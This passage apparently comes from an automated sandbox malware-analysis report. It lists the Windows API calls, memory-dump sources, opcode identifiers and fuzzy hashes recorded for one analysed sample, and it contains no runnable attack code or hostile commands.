                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: Pz
                                                                  • API String ID: 3248276644-4075803849
                                                                  • Opcode ID: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
                                                                  • Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
                                                                  • Opcode Fuzzy Hash: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
                                                                  • Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 004050B7
                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405108
                                                                    • Part of subcall function 004040C7: SendMessageA.USER32(?,?,00000000,00000000), ref: 004040D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                  • Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
                                                                  • Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                  • Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,007A1EE0,(y,?,-000010B8,-000010B8,00000002,-000010B8,?,00406118,80000002), ref: 00405F1A
                                                                  • RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,-000010B8,007A1EE0,007A1EE0,?,0079ED28), ref: 00405F25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: (y
                                                                  • API String ID: 3356406503-255812342
                                                                  • Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                  • Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
                                                                  • Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                  • Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405BC9
                                                                  • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: nsa
                                                                  • API String ID: 1716503409-2209301699
                                                                  • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                  • Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
                                                                  • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                  • Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
                                                                  • CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B24
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                  • Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
                                                                  • Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                  • Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9